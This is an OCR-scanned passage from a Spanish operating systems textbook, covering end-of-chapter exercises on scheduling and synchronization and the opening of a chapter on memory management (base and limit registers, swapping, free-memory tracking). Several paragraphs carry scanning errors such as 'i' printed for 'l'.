po. Tienen tiempos de ejecución estimados de 10, 6, 2, 4 y 8 minutos. Sus prioridades (determina¬ 
das en forma externa) son 3, 5, 2, 1 y 4, respectivamente, en donde 5 es la prioridad más alta. Para 
cada uno de los siguientes algoritmos de planificación, determine el tiempo de respuesta de proce¬ 
so promedio. Ignore la sobrecarga por conmutación de procesos. 

a) Por turno circular. 

b) Por prioridad. 

c) Primero en entrar, primero en ser atendido (ejecutados en el orden 10, 6, 2, 4, 8). 

d) El trabajo más corto primero. 

Para (a), suponga que el sistema es multiprogramado y que cada trabajo recibe su parte equitativa 
de la CPU. Para los incisos del (b) al (d), suponga que sólo se ejecuta un trabajo a la vez hasta que 
termina. Todos los trabajos están completamente ligados a la CPU. 

38. Un proceso que se ejecuta en un CTSS necesita 30 quántums para completarse. ¿Cuántas veces se 
debe intercambiar, incluyendo la primera vez (antes de que se haya ejecutado siquiera)? 

39. ¿Puede idear una forma de evitar que el sistema de prioridades CTSS sea engañado por los retornos 
de carro? 

40. El algoritmo de envejecimiento con a = 1/2 se utiliza para predecir los tiempos de ejecución. Las 
cuatro ejecuciones anteriores, de la más antigua a la más reciente, son de 40, 20, 40 y 15 mseg. ¿Cuál 
es la predicción del siguiente tiempo? 

41. Un sistema de tiempo real suave tiene cuatro eventos periódicos con periodos de 50, 100, 200 y 250 
mseg cada uno. Suponga que los cuatro eventos requieren 35, 20, 10 y X mseg de tiempo de la CPU, 
respectivamente. ¿Cuál es el mayor valor de X para que el sistema sea planificable? 

42. Explique por qué se utiliza comúnmente la planificación de dos niveles. 

43. Un sistema de tiempo real necesita manejar dos llamadas de voz, en donde cada una de ellas se eje¬ 
cuta cada 5 mseg y consume 1 mseg de tiempo de la CPU por ráfaga, más un video a 25 cuadros- 
/segundo, en donde cada cuadro requiere 20 mseg de tiempo de la CPU. ¿Es planificable este 
sistema? 

44. Considere un sistema en el que se desean separar la política y el mecanismo para la planificación de 
hilos de kemel. Proponga una manera de lograr este objetivo. 

45. En la solución al problema de los filósofos comelones (figura 2-46), ¿por qué la variable de estado 
se establece a HAM BRIENTO en el procedimiento tomar_teneclores? 
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46. Considere el procedimiento poner_tenedores en la figura 2-46. Suponga que la variable estaclo[i] se 
estableció a PENSANDO después de las dos llamadas a probar, en vez de antes. ¿Cómo afectaría 
esto a la solución? 

47. El problema de los lectores y escritores se puede formular de varias maneras respecto a cuál catego¬ 
ría de procesos se puede iniciar y cuándo. Describa con cuidado tres variaciones distintas del pro¬ 
blema, cada una favoreciendo (o no favoreciendo) a alguna categoría de procesos. Para cada 
variación, especifique lo que ocurre cuando un lector o escritor está listo para acceder a la base de 
datos y qué ocurre cuando un proceso termina de usar la base de datos. 

48. Escriba una secuencia de comandos de shell que produzca un archivo de números secuenciales, para 
lo cual debe leer el último número en el archivo, sumarle 1 y después adjuntar el resultado al archi¬ 
vo. Ejecute una instancia de la secuencia de comandos en segundo plano y una en primer plano, ca¬ 
da una de las cuales debe acceder al mismo archivo. ¿Cuánto tiempo pasa antes de que se manifieste 
una condición de carrera en sí? ¿Cuál es la región crítica? Modifique la secuencia de comandos para 
evitar la condición de carrera (Sugerencia: Utilice 

In archivo archivo.lock 

para bloquear el archivo de datos). 

49. Suponga que tiene un sistema operativo que proporciona semáforos. Implemento un sistema de men¬ 
sajes. Escriba los procedimientos para enviar y recibir mensajes. 

50. Resuelva el problema de los filósofos comelones utilizando monitores en vez de semáforos. 

51. Suponga que una universidad desea mostrar su rectitud política al aplicar la doctrina “Separado pero 
igual es inherentemente desigual” de la Suprema Corte de los Estados Unidos al género así como a 
la raza, finalizando con su vieja práctica de los baños segregados por el género en los campus. Sin 
embargo, como una concesión a la tradición, decreta que cuando haya una mujer en el baño, pueden 
entrar otras mujeres pero no hombres, y viceversa. Un signo con una marca deslizable en la puerta de 
cada baño indica en cuál de los tres estados se encuentra en un momento dado: 

• Vacío 

• Mujer presente 

• Hombre presente 

En algún lenguaje de programación de su preferencia, escriba los siguientes procedimientos: mujer- 
_clesea_entrar, hombre_desea_entrar, mujer_sale, hombre_sale. Puede usar los contadores y técni¬ 
cas de sincronización que desee. 

52. Vuelva a escribir el programa de la figura 2-23 para manejar más de dos procesos. 

53. Escriba un problema productor-consumidor que utilice hilos y comparta un búfer común. Sin em¬ 
bargo, no utilice semáforos o cualquier otra primitiva de sincronización para proteger las estructu¬ 
ras de datos compartidas. Sólo deje que cada hilo las utilice cuando quiera. Use sleep y wakeup para 
manejar las condiciones de lleno y vacío. Vea cuánto tiempo se requiere para que ocurra una condi¬ 
ción de carrera fatal. Por ejemplo, podría hacer que el productor imprima un número de vez en 
cuando. No imprima más de un número cada minuto, debido a que la E/S podría afectar a las con¬ 
diciones de carrera. 
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La memoria principal (RAM ) es un importante recurso que debe administrarse con cuidado. Aun¬ 
que actualmente una computadora doméstica promedio tiene 10,000 veces más memoria que la 
IBM 7094, la computadora más grande en el mundo a principios de la década de 1960, los progra¬ 
mas están creciendo con más rapidez que las memorias. Parafraseando la ley de Parkinson diría que 
"los programas se expanden para llenar la memoria disponible para contenerlos". En este capítulo 
estudiaremos la forma en que los sistemas operativos crean abstracciones de la memoria y cómo las 
administran. 

Lo que todo programador quisiera es una memoria privada, de tamaño y rapidez infinitas, que 
también sea no volátil, es decir, que no pierda su contenido cuando se desconecta de la potencia 
eléctrica. Y ya que estamos en ello, ¿por qué no hacerla barata también? Por desgracia, la tecnolo¬ 
gía no proporciona tales memorias en estos momentos. Tal vez usted descubra cómo hacerlo. 

¿Cuál es la segunda opción? A través de los años se ha elaborado el concepto de jerarquía de 
memoria, de acuerdo con el cual, las computadoras tienen unos cuantos megabytes de memoria ca¬ 
ché, muy rápida, costosa y volátil, unos cuantos gigabytes de memoria principal, de mediana velo¬ 
cidad, a precio mediano y volátil, unos cuantos terabytes de almacenamiento en disco lento, 
económico y no volátil, y el almacenamiento removible, como los DV Ds y las memorias USB. El 
trabajo del sistema operativo es abstraer esta jerarquía en un modelo útil y después administrarla. 

La parte del sistema operativo que administra (parte de) la jerarquía de memoria se conoce co¬ 
mo administrador de memoria. Su trabajo es administrar la memoria con eficiencia: llevar el re¬ 
gistro de cuáles partes de la memoria están en uso, asignar memoria a los procesos cuando la 
necesiten y desasignarla cuando terminen. 
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En este capítulo investigaremos varios esquemas distintos de administración de memoria, que 
varían desde muy simpies hasta muy sofisticados. Como generai mente ei hardware es ei queseen- 
carga de administrar ei nivei más bajo de memoria caché, en este capítuio nos concentraremos en 
ei modeio dei programador de ia memoria principai y en cómo se puede administrar bien. Las abs¬ 
tracciones y ia administración dei aimacenamiento permanente, ei disco, son ei tema dei siguiente 
capítuio. Anaiizaremos primero ios esquemas más simpies posibies y después progresaremos de 
manera graduai hacia esquemas cada vez más ei aborados. 

3.1 SIN ABSTRACCIÓN DE MEMORIA 

La abstracción más simpie de memoria es ninguna abstracción. Las primeras computadoras main- 
frame (antes de 1960), ias primeras minicomputadoras (antes de 1970) y ias primeras computado¬ 
ras personaies (antes de 1980) no tenían abstracción de memoria. Cada programa veía simpiemente 
ia memoria física. Cuando un programa ejecutaba una instrucción como 

MOV REGISTR01, 1000 

i a computadora sóio movía ei contenido de ia ubicación de memoria física 1000 a REG ISTROl. Así, 
ei modeio de programación que se presentaba ai programador era simpiemente ia memoria física, 
un conjunto de direcciones desde 0 hasta cierto vaior máximo, en donde cada dirección correspon¬ 
día a una ceida que contenía cierto número de bits, comúnmente ocho. 

Bajo estas condiciones, no era posibie tener dos programas ejecutándose en memoria ai mismo 
tiempo. Si ei primer programa escribía un nuevo vaior en, porejempio, ia ubicación 2000, esto bo¬ 
rraría cuaiquier vaior que ei segundo programa estuviera aimacenando ahí. Ambos programas fai i a- 
rían de inmediato. 

Inciuso cuando ei modeio de memoria consiste en sóio ia memoria física hay varias opciones 
posibies. En ia figura 3-1 se muestran tres variaciones. Ei sistema operativo puede estar en ia parte 
inferior de ia memoria en ia RA M (Random Access M emory, M emoria de acceso aieatorio), como 
se muestra en ia figura 3-l(a), puede estar en ia ROM (Read Oniy M emory, M emoria de sóio iec- 
tura) en ia parte superior de ia memoria, como se muestra en ia figura 3-l(b), o ios controiadores 
de dispositivos pueden estar en ia parte superior de ia memoria en una ROM y ei resto dei sistema 
en RAM más abajo, como se muestra en ia figura 3-l(c). Ei primer modeio se utiiizó antes en ias 
mainframes y mi ni computadoras, pero actuai mente casi no se empiea. Ei segundo modeio se utiii- 
za en aigunas computadoras de boisiiio y sistemas integrados. Ei tercer modeio fue utiiizado por ias 
primeras computadoras personaies (por ejempio, ias que ejecutaban M S-DOS), donde ia porción 
dei sistema en ia ROM se conoce como BIOS (Basic Input Output System, Sistema básico de en¬ 
trada y saiida). Los modeios (a) y (c) tienen ia desventaja de que un error en ei programa de usua¬ 
rio puede borrar ei sistema operativo, posibiemente con resuitados desastrosos (ia información dei 
disco podría quedar ininteiigibie). 

Cuando ei sistema se organiza de esta forma, por io generai se puede ejecutar sóio un proceso 
a ia vez. Tan pronto como ei usuario teciea un comando, ei sistema operativo copia ei programa so- 
iicitado dei disco a ia memoria y io ejecuta. Cuando termina ei proceso, ei sistema operativo mués- 
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Figura 3-1. Tres formas simples de organizar la memoria con un sistema operativo y 
un proceso de usuario. También existen otras posibilidades. 


tra un carácter indicador de comando y espera un nuevo comando. Cuando recibe el comando, car¬ 
ga un nuevo programa en memoria, sobrescribiendo el primero. 

Una forma de obtener cierto grado de paralelismo en un sistema, sin abstracción de memoria, 
es programar con múltiples hilos. Como se supone que todos los hilos en un proceso ven la misma 
imagen de memoria, el hecho de que se vean obligados a hacerlo no es un problema. Aunque esta 
idea funciona, es de uso limitado ya que lo que las personas desean a menudo es que los programas 
no relacionados se ejecuten al mismo tiempo, algo que la abstracción de los hilos no provee. Ade¬ 
más, es muy poco probable que un sistema tan primitivo como para no proporcionar una abstrac¬ 
ción de memoria proporcione una abstracción de hilos. 

Ejecución de múltiple programas sin una abstracción de memoria 

No obstante, aun sin abstracción de memoria es posible ejecutar varios programas al mismo tiem¬ 
po. Lo que el sistema operativo debe hacer es guardar todo el contenido de la memoria en un archi¬ 
vo en disco, para después traer y ejecutar el siguiente programa. M ientras sólo haya un programa a 
la vez en la memoria no hay conflictos. Este concepto, el intercambio, se analiza a continuación. 

Con la adición de cierto hardware especial es posible ejecutar múltiples programas concurren¬ 
temente, aun sin intercambio. Los primeros modelos de la IBM 360 resolvieron el problema de la 
siguiente manera: la memoria estaba dividida en bloques de 2 K B ya cada uno se le asignaba una 
llave de protección de 4 bits, guardada en registros especiales dentro de la CPU. Un equipo con 
una memoria de 1 M B sólo necesitaba 512 de estos registros de 4 bits para totalizar 256 bytes de 
almacenamiento de la llave. El registro PSW (Program Status Word, Palabra de estado del progra¬ 
ma) también contenía una llave de 4 bits. El hardware de la 360 controlaba mediante un trap cual¬ 
quier intento por parte de un proceso en ejecución de acceder a la memoria con un código de 
protección distinto del déla llave del PSW. Como sólo el sistema operativo podía modificar las lla¬ 
ves de protección, los procesos de usuario fueron controlados para que no interfirieran unos con 
otros, ni con el mismo sistema operativo. 
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Sin embargo, esta solución tenía una gran desventaja, que se ilustra en la figura 3-2. Como 
muestran las figuras 3-2(a) y (b), se tienen dos programas, cada uno con un tamaño de 16 KB. El 
primero está sombreado para indicar que tiene una llave de memoria diferente a la del segundo y 
empieza saltando a la dirección 24, que contiene una instrucción mov; el segundo, saltando a la 
dirección 28, que contiene una instrucción cmp. Las instrucciones que no son relevantes para este 
análisis no se muestran. Cuando los dos programas se cargan consecutivamente en la memoria, em¬ 
pezando en la dirección 0, tenemos la situación de la figura 3-2(c). Para este ejemplo, suponemos 
que el sistema operativo está en la parte alta de la memoria y no se muestra. 
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Figura 3-2. Ilustración del problema de reubicación, (a) Un programa de 16 KB. (b) 
Otro programa de 16 KB. (c) Los dos programas cargados consecutivamente en la me¬ 
moria. 


Una vez que los programas se cargan se pueden ejecutar. Como tienen distintas llaves de me¬ 
moria, ninguno de los dos puede dañar al otro. Pero el problema es de una naturaleza distinta. Cuan¬ 
do se inicia el primer programa, ejecuta la instrucción jmp24, que salta a la instrucción, como se 
espera. Este programa funciona de manera normal. 

Sin embargo, después de que el primer programa se ha ejecutado el tiempo suficiente, el siste¬ 
ma operativo tal vez decida ejecutar el segundo programa, que se carga encima del primero, en la 
dirección 16,384. La primera instrucción ejecutada es jmp 28 , que salta a la instrucción Aooen el pri¬ 
mer programa, y no a la instrucción cmp a la que se supone debe saltar. Es muy probable que 
el programa falle en menos de 1 segundo. 











































SECCION 3.2 UNAABSTRACCION DE MEMORIA: ESPACIOS DE DIRECCIONES 179 


El problema central aquí es que los dos programas hacen referencia a la memoria física absolu¬ 
ta. Eso, definitivamente, no es lo que queremos: deseamos que cada programa haga referencia a un 
conjunto privado de direcciones locales para él. En breve le mostraremos cómo se logra esto. Lo que 
la IBM 360 hacía como solución para salir del paso era modificar el segundo programa al instante, 
a medida que se cargaba en la memoria, usando una técnica conocida como reubicación estática. 
Esta técnica funcionaba así: cuando se cargaba un programa en la dirección 16,384, se sumaba el va¬ 
lor constante 16,384 a todas las direcciones del programa durante el proceso de carga. Aunque este 
mecanismo funciona si se lleva a cabo en la forma correcta, no es una solución muy general y redu¬ 
ce la velocidad de la carga. Lo que es más, se requiere información adicional en todos los programas 
ejecutables para indicar cuáles palabras contienen direcciones (reubicables) y cuáles no. Después de 
todo, el "28" en la figura 3-2(b) tiene que reubicarse, pero una instrucción como 

MOV REGISTR01,28 

que mueve el número 28 a REGISTROl no se debe reubicar. El cargador necesita cierta forma de 
saber qué es una dirección y qué es una constante. 

Por último, como recalcamos en el capítulo 1, la historia tiende a repetirse en el mundo de las 
computadoras. M ientrasqueel direccionamiento directo de la memoria física está muy lejos de po¬ 
der aplicarse en las mainframes, minicomputadoras, computadoras de escritorio y notebooks, la fal¬ 
ta de una abstracción de memoria sigue siendo común en los sistemas integrados y de tarjeta 
inteligente. En la actualidad, los dispositivos como las radios, las lavadoras y los hornos de mi¬ 
croondas están llenos de software (en ROM), y en la mayoría de los casos el software direcciona 
memoria absoluta. Esto funciona debido a que todos los programas se conocen de antemano, y los 
usuarios no tienen la libertad de ejecutar su propio software en su tostador. 

M ientras que los sistemas integrados de alta tecnología (como los teléfonos celulares) tienen 
sistemas operativos elaborados, los más simples no. En algunos casos hay un sistema operativo, pe¬ 
ro es sólo una biblioteca ligada con el programa de aplicación y proporciona llamadas al sistema 
para realizar operaciones de E/S y otras tareas comunes. El popular sistema operativo e-cos es un 
ejemplo común de un sistema operativo como biblioteca. 


3.2 UNAABSTRACCION DE MEMORIA: 

ESPACIOS DE DIRECCIONES 

Con todo, exponer la memoria física a los procesos tiene varias desventajas. En primer lugar, si los 
programas de usuario pueden direccionar cada byte de memoria, pueden estropear el sistema operati¬ 
vo con facilidad, ya sea intencional o accidentalmente, con lo cual el sistema se detendría en forma 
súbita (a menos que haya hardware especial como el esquema de bloqueo y llaves de la IBM 360). Es¬ 
te problema existe aun cuando sólo haya un programa de usuario (aplicación) en ejecución. En segun¬ 
do lugar, con este modelo es difícil tener varios programas en ejecución a la vez (tomando turnos, si 
sólo hay una CPU). En las computadoras personales es común tener varios programas abiertos a la 
vez (un procesador de palabras, un programa de correo electrónico y un navegador Web, donde uno 
de ellos tiene el enfoque actual, pero los demás se reactivan con el clic de un ratón). Como esta situa¬ 
ción es difícil de lograr cuando no hay una abstracción de la memoria física, se tuvo que hacer algo. 
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3.2.1 La noción de un espacio de direcciones 

Hay que resolver dos problemas para permitir que haya varias apiicaciones en memoria ai mismo 
tiempo sin que interfieran entre sí: protección y reubicación. Ya anaiizamos una soiución primiti¬ 
va ai primer probiema en ia IBM 360: etiquetar trozos de memoria con una iiave de protección y 
comparar ia iiavedei proceso en ejecución con ia de cada paiabra de memoria obtenida por ia CPU. 
Sin embargo, este método por sí soio no resueive ei segundo probiema, aunque se puede resoiver 
mediante ia reubicación de ios programas ai momento de cargados, pero ésta es una soiución ienta 
y compiicada. 

Una mejor soiución es inventar una nueva abstracción para ia memoria: ei espacio de direccio¬ 
nes. Así como ei concepto dei proceso crea un tipo de CPU abstracta para ejecutar programas, ei 
espacio de direcciones crea un tipo de memoria abstracta para que ios programas vivan ahí. Un es¬ 
pacio de direcciones (address space) es ei conjunto de direcciones que puede utiiizar un proceso 
para direccionar ia memoria. Cada proceso tiene su propio espacio de direcciones, independiente de 
ios que pertenecen a otros procesos (excepto en ciertas circunstancias especiaies en donde ios pro¬ 
cesos desean compartir sus espacios de direcciones). 

Ei concepto de un espacio de direcciones es muy generai y ocurre en muchos contextos. Con¬ 
sidere ios números teiefónicos. En ios Estados Unidos y en muchos otros países, un número de te- 
iéfono iocai es comúnmente un número de 7 dígitos. En consecuencia, ei espacio de direcciones 
para ios números teiefónicos varía desde 0,000,000 hasta 9,999,999, aunque aigunos números, co¬ 
mo ios que empiezan con 000, no seutiiizan. Con ei crecimiento de iosteiéfonosceiuiares, módems 
y máquinas de fax, este espacio se está voiviendo demasiado pequeño, en cuyo caso habrá qué uti¬ 
iizar más dígitos. Ei espacio de direcciones para ios puertos de E/S en ei Pentium varía desde 0 has¬ 
ta 16383. Las direcciones IPv4 son números de 32 bits, por io que su espacio de direcciones varía 
desde 0 hasta 2^^ - 1 (de nuevo, con ciertos números reservados). 

Los espacios de direcciones no tienen que ser numéricos. Ei conjunto de dominios .com de In¬ 
ternet es también un espacio de direcciones. Este espacio de direcciones consiste de todas ias cade¬ 
nas de iongitud de 2 a 63 caracteres que se puedan formar utiiizando ietras, números y guiones 
cortos, seguidas de .com. Para estos momentos usted debe de hacerse hecho ya ia idea. Es bastante 
simpie. 

Aigo un poco másdifícii es proporcionara cada programa su propio espacio de direcciones, de 
manera que ia dirección 28 en un programa indique una ubicación física distinta de ia dirección 28 
en otro programa. A continuación anaiizaremos una forma simpie que soiía ser común, pero ha caí¬ 
do en desuso debido a ia habiiidad de poner esquemas mucho más compiicados (y mejores) en ios 
chips de CPU modernos. 

Registros base y límite 

La soiución sencida utiiiza una versión muy simpie de ia reubicación dinámica. Lo que hace es 
asociar ei espacio de direcciones de cada proceso sobre una parte distinta de ia memoria física, de 
una manera simpie. La soiución ciásica, que se utiiizaba en máquinas desde ia CDC 6600 (ia pri¬ 
mera supercomputadora dei mundo) hasta ei Intei 8088 (ei corazón deia IBM PC original), es equi¬ 
par cada CPU con dos registros de hardware especiales, conocidos comúnmente como los registros 
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base y límite. Cuando se utilizan estos registros, los programas se cargan en ubicaciones consecuti¬ 
vas de memoria en donde haya espacio y sin reubicación durante la carga, como se muestra en la fi¬ 
gura 3-2(c). Cuando se ejecuta un proceso, el registro base se carga con la dirección física donde 
empieza el programa en memoria y el registro límite se carga con la longitud del programa. En la fi¬ 
gura 3-2(c), los valores base y límite que se cargarían en estos registros de hardware al ejecutar el pri¬ 
mer programa son 0 y 16,384, respectivamente. Los valores utilizados cuando se ejecuta el segundo 
programa son 16,384 y 16,384, respectivamente. Si se cargara un tercer programa de 16 KB directa¬ 
mente por encima del segundo y se ejecutara, los registros base y límite serían 32,768 y 16,384. 

Cada vez que un proceso hace referencia a la memoria, ya sea para obtener una instrucción de 
memoria, para leer o escribir una palabra de datos, el hardware de la CPU suma de manera automá¬ 
tica el valor base a la dirección generada por el proceso antes de enviar la dirección al bus de me¬ 
moria. Al mismo tiempo comprueba si la dirección ofrecida es igual o mayor que el valor resultante 
de sumar los valores de los registros límite y base, en cuyo caso se genera un fallo y se aborta el ac¬ 
ceso. Por ende, en el caso de la primera instrucción del segundo programa en la figura 3-2(c), el 
proceso ejecuta una instrucción 

JMP 28 

pero el hardware la trata como si fuera 

JMP 16412 

por lo que llega a la instrucción cmp, como se esperaba. Los valores de los registros base y límite 
durante la ejecución del segundo programa de la figura 3-2(c) se muestran en la figura 3-3. 

El uso de registros base y límite es una manera fácil de proporcionar a cada proceso su propio 
espacio de direcciones privado, ya que a cada dirección de memoria que se genera en forma auto¬ 
mática se le suma el contenido del registro base antes de enviarla a memoria. En muchas implemen- 
taciones, los registros base y límite están protegidos de tal forma que sólo el sistema operativo 
puede modificarlos. Éste fue el caso en la CDC 6600, pero no el del Intel 8088, que ni siquiera te¬ 
nía el registro límite. Sin embargo, tenía varios registros base, lo cual permitía que se reubicaran 
texto y datos de manera independiente, pero no ofrecía una protección contra las referencias a me¬ 
moria fuera de rango. 

Una desventaja de la reubicación usando los registros base y límite es la necesidad de realizar 
una suma y una comparación en cada referencia a memoria. Las comparaciones se pueden hacer 
con rapidez, pero las sumas son lentas debido al tiempo de propagación del acarreo, a menos que 
se utilicen circuitos especiales de suma. 

3.2.2 I ntercambio 

Si la memoria física de la computadora es lo bastante grande como para contener todos los proce¬ 
sos, los esquemas descritos hasta ahora funcionarán en forma más o menos correcta. Pero en la 
práctica, la cantidad total de RAM que requieren todos los procesos es a menudo mucho mayor de 
lo que puede acomodarse en memoria. En un sistema Windows o Linux común, se pueden iniciar 
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Figura 3-3. Se pueden utilizar registros base y límite para dar a cada proceso un espa¬ 
cio de direcciones separado. 


entre 40 y 60 procesos o más cada vez que se inicia la computadora. Por ejemplo, cuando se insta¬ 
la una aplicación Windows, a menudo emite comandos de manera que en los inicios subsiguientes 
del sistema se inicie un proceso que no haga nada, excepto buscar actualizaciones para la aplica¬ 
ción. Dicho proceso puede ocupar fácilmente de 5 a 10 M B de memoria. Otros procesos en segun¬ 
do plano comprueban el correo entrante, las conexiones de red entrantes y muchas otras cosas. Y 
todo esto se hace antes de que se inicie el primer programa de usuario. Hoy en día, los programas 
de aplicaciones de usuario serios pueden ejecutarse ocupando fácilmente desde 50 a 200 M B y más. 
En consecuencia, para mantener todos los procesos en memoria todo el tiempo se requiere una gran 
cantidad de memoria y no puede hacerse si no hay memoria suficiente. 

A través de los años se han desarrollado dos esquemas generales para lidiar con la sobrecar¬ 
ga de memoria. La estrategia más simple, conocida como intercambio, consiste en llevar ca¬ 
da proceso completo a memoria, ejecutarlo durante cierto tiempo y después regresarlo al disco. 
Los procesos inactivos mayormente son almacenados en disco, de tal manera que no ocupan 
memoria cuando no se están ejecutando (aunque algunos de ellos se despiertan periódicamente pa¬ 
ra realizar su trabajo y después vuelven a quedar inactivos). La otra estrategia, conocida como me¬ 
moria virtuai, permite que los programas se ejecuten incluso cuando sólo se encuentran en forma 
parcial en la memoria. A continuación estudiaremos el intercambio: en la sección 3.3 examinare¬ 
mos la memoria virtual. 
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La operación de un sistema de intercambio se iiustra en ia figura 3-4. Ai principio, sóio ei pro¬ 
ceso A está en ia memoria. Después ios procesos B y C se crean o se intercambian desde disco. En 
ia figura 3-4(d), A se intercambia ai disco. Después iiega D y saie B. Por úitimo, A entra de nuevo. 
Como A está ahora en una ubicación distinta, ias direcciones que contiene se deben reubicar, ya sea 
mediante software cuando se intercambia o (más probabiemente) mediante hardware durante ia eje¬ 
cución dei programa. Porejempio, ios registros base y iímite funcionarían bien en este caso. 
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Figura 3-4. La asignación de la memoria cambia a medida que llegan procesos a la 
memoria y salen de ésta. Las regiones sombreadas son la memoria sin usar. 


Cuando ei intercambio crea varios huecos en ia memoria, es posibie combinarios todos en uno 
grande despiezando ios procesos io más hacia abajo que sea posibie. Esta técnica se conoce como 
compactación de memoria. Por io generai no se reaiiza debido a que requiere mucho tiempo de ia 
CPU. Por ejempio, en una máquina con 1 GB que pueda copiar 4 bytes en 20 nseg, se requerirían 
aproximadamente 5 segundos para compactar toda ia memoria. 

U n aspecto que vaie ia pena mencionar es ia cantidad de memoria que debe asignarse a un pro¬ 
ceso cuando éste se crea o se intercambia. Si ios procesos se crean con un tamaño fijo que nunca 
cambia, entonces ia asignación es sencida: ei sistema operativo asigna exactamente io necesario, ni 
más ni menos. 

No obstante, si ios segmentos de datos de ios procesos pueden crecer, por ejempio mediante ia 
asignación dinámica de memoria proveniente de un heap, como en muchos ienguajes de programa¬ 
ción, ocurre un probiema cuando un proceso trata de crecer. Si hay un hueco adyacente ai proceso, 
puede asignarse y se permite ai proceso crecer en ei hueco; si ei proceso está adyacente a otro pro¬ 
ceso, ei proceso en crecimiento tendrá que moverse a un hueco en memoria que sea io bastante 
grande como para aiojario, o habrá que intercambiar uno o más procesos para crear un hueco con 
ei tamaño suficiente. Si un proceso no puede crecer en memoria y ei área de intercambio en ei dis¬ 
co está iiena, ei proceso tendrá que suspenderse hasta que se iibere aigo de espacio (o se puede eii- 
minar). 
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Si se espera que la mayoría de los procesos crezcan a medida que se ejecuten, probablemente 
sea conveniente asignar un poco de memoria adicional cada vez que se intercambia o se mueve un 
proceso, para reducir la sobrecarga asociada con la acción de mover o intercambiar procesos que ya 
no caben en su memoria asignada. No obstante, al intercambiar procesos al disco, se debe intercam¬ 
biar sólo la memoria que se encuentre en uso; es un desperdicio intercambiar también la memoria 
adicional. En la figura 3-5(a) podemos ver una configuración de memoria en la cual se ha asigna¬ 
do espacio para que crezcan dos procesos. 

I Espacio para crecer 
I Realmente en uso 

I Espacio para crecer 
I Realmente en uso 


(b) 

Figura 3-5. (a) Asignación de espacio para un segmento de datos en crecimiento. 

(b) Asignación de espacio para una pila en crecimiento y un segmento de datos en cre¬ 
cimiento. 

Si los procesos pueden tener dos segmentos en crecimiento, por ejemplo, cuando el segmento 
de datos se utiliza como heap para las variables que se asignan y liberan en forma dinámica y un 
segmento de pila para las variables locales normales y las direcciones de retorno, un arreglo alter¬ 
nativo se sugiere por sí mismo, a saber, el de la figura 3-5(b). En esta figura podemos ver que cada 
proceso ilustrado tiene una pila en la parte superior de su memoria asignada, la cual está creciendo 
hacia abajo, y un segmento de datos justo debajo del texto del programa, que está creciendo hacia 
arriba. La memoria entre estos segmentos se puede utilizar para cualquiera de los dos. Si se agota, 
el proceso tendrá que moverse a un hueco con suficiente espacio, intercambiarse fuera de la memo¬ 
ria hasta que se pueda crear un hueco lo suficientemente grande, o eliminarse. 

3.2.3 Administración de memoria libre 

Cuando la memoria se asigna en forma dinámica, el sistema operativo debe administrarla. En tér¬ 
minos generales, hay dos formas de llevar el registro del uso de la memoria: mapas de bits y listas 
libres. En esta sección y en la siguiente analizaremos estos dos métodos. 



(a) 
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Administración de memoria con mapas de bits 

Con un mapa de bits, la memoria se divide en unidades de asignación tan pequeñas como unas cuan¬ 
tas palabras y tan grandes como varios kilobytes. Para cada unidad de asignación hay un bit corres¬ 
pondiente en el mapa de bits, que es 0 si la unidad está libre y 1 si está ocupada (o viceversa). La 
figura 3-6 muestra parte de la memoria y el mapa de bits correspondiente. 



en la 18 2 

(b) (c) 

Figura 3-6. (a) U na parte de la memoria con cinco procesos y tres huecos. Las mar¬ 
cas de graduación muestran las unidades de asignación de memoria. Las regiones som¬ 
breadas (0 en el mapa de bits) están libres, (b) El mapa de bits correspondiente, (c) La 
misma información en forma de lista. 

El tamaño de la unidad de asignación es una importante cuestión de diseño. Entre más peque¬ 
ña sea la unidad de asignación, mayor será el mapa de bits. Sin embargo, aun con una unidad de 
asignación tan pequeña como 4 bytes, 32 bits de memoria sólo requerirán 1 bit del mapa. Una me¬ 
moria de32n bits utilizará n bits del mapa, por lo que el mapa de bits ocupará sólo 1/33 de la memo¬ 
ria. Si la unidad de asignación se elige de manera que sea grande, el mapa de bits será más pequeño 
pero se puede desperdiciar una cantidad considerable de memoria en la última unidad del proceso 
si su tamaño no es un múltiplo exacto de la unidad de asignación. 

Un mapa de bits proporciona una manera simple de llevar el registro de las palabras de memoria 
en una cantidad fija de memoria, debido a que el tamaño del mapa de bits sólo depende del tamaño 
déla memoria y el tamaño déla unidad de asignación. El problema principal es que, cuando se ha de¬ 
cidido llevar un proceso de k unidades a la memoria, el administrador de memoria debe buscar en el 
mapa para encontrar una serie de k bits consecutivos con el valor 0 en el mapa de bits. El proceso de 
buscar en un mapa de bits una serie de cierta longitud es una operación lenta (debido a que la serie 
puede cruzar los límites entre las palabras en el mapa): éste es un argumento contra los mapas de bits. 

Administración de memoria con iistas iigadas 

Otra manera de llevar el registro de la memoria es mantener una lista ligada de segmentos de me¬ 
moria asignados y libres, en donde un segmento contiene un proceso o es un hueco vacío entre dos 




















































186 


ADMINISTRACION DE MEMORIA 


CAPITULO 3 


procesos. La memoria de la figura 3-6(a) se representa en la figura 3-6(c) como una lista ligada de 
segmentos. Cada entrada en la lista especifica un hueco (H) o un proceso (P), la dirección en la que 
inicia, la longitud y un apuntador a la siguiente entrada. 

En este ejemplo, la lista de segmentos se mantiene ordenada por dirección. AI ordenarla de es¬ 
ta manera, tenemos la ventaja de que cuando termina un proceso o se intercambia, el proceso de ac¬ 
tualizar la lista es simple. Un proceso en terminación por lo general tiene dos vecinos (excepto 
cuando se encuentra en la parte superior o inferior de la memoria). Éstos pueden ser procesos o hue¬ 
cos, lo cual conduce a las cuatro combinaciones de la figura 3-7. En la figura 3-7(a), para actuali¬ 
zar la lista se requiere reemplazar una P por una H. En las figuras 3-7(b) y 3-7(c) dos entradas se 
fusionan en una sola y la lista se reduce en una entrada. En la figura 3-7(d), se fusionan las tres en¬ 
tradas y dos elementos son eliminados de la lista. 

Como la ranura de la tabla de procesos para el proceso en terminación en general apuntará a la 
entrada en la lista para el mismo proceso, puede ser más conveniente tener la lista como una lista 
doblemente ligada, en vez de la lista simplemente ligada de la figura 3-6(c). Esta estructura facili¬ 
ta encontrar la entrada anterior y ver si es posible una combinación. 


Antes de que termine X 



Después de que termina X 



Figura 3-7. Cuatro combinaciones de los vecinos para el proceso en terminación, X. 

Cuando los procesos y huecos se mantienen en una lista ordenada por dirección, se pueden utili¬ 
zar varios algoritmos para asignar memoria a un proceso creado (o a un proceso existente que se in¬ 
tercambie del disco). Suponemos que el administrador de memoria sabe cuánta debe asignar. El 
algoritmo mássimpleesel de primer ajuste: el administrador de memoria explora la lista de segmen¬ 
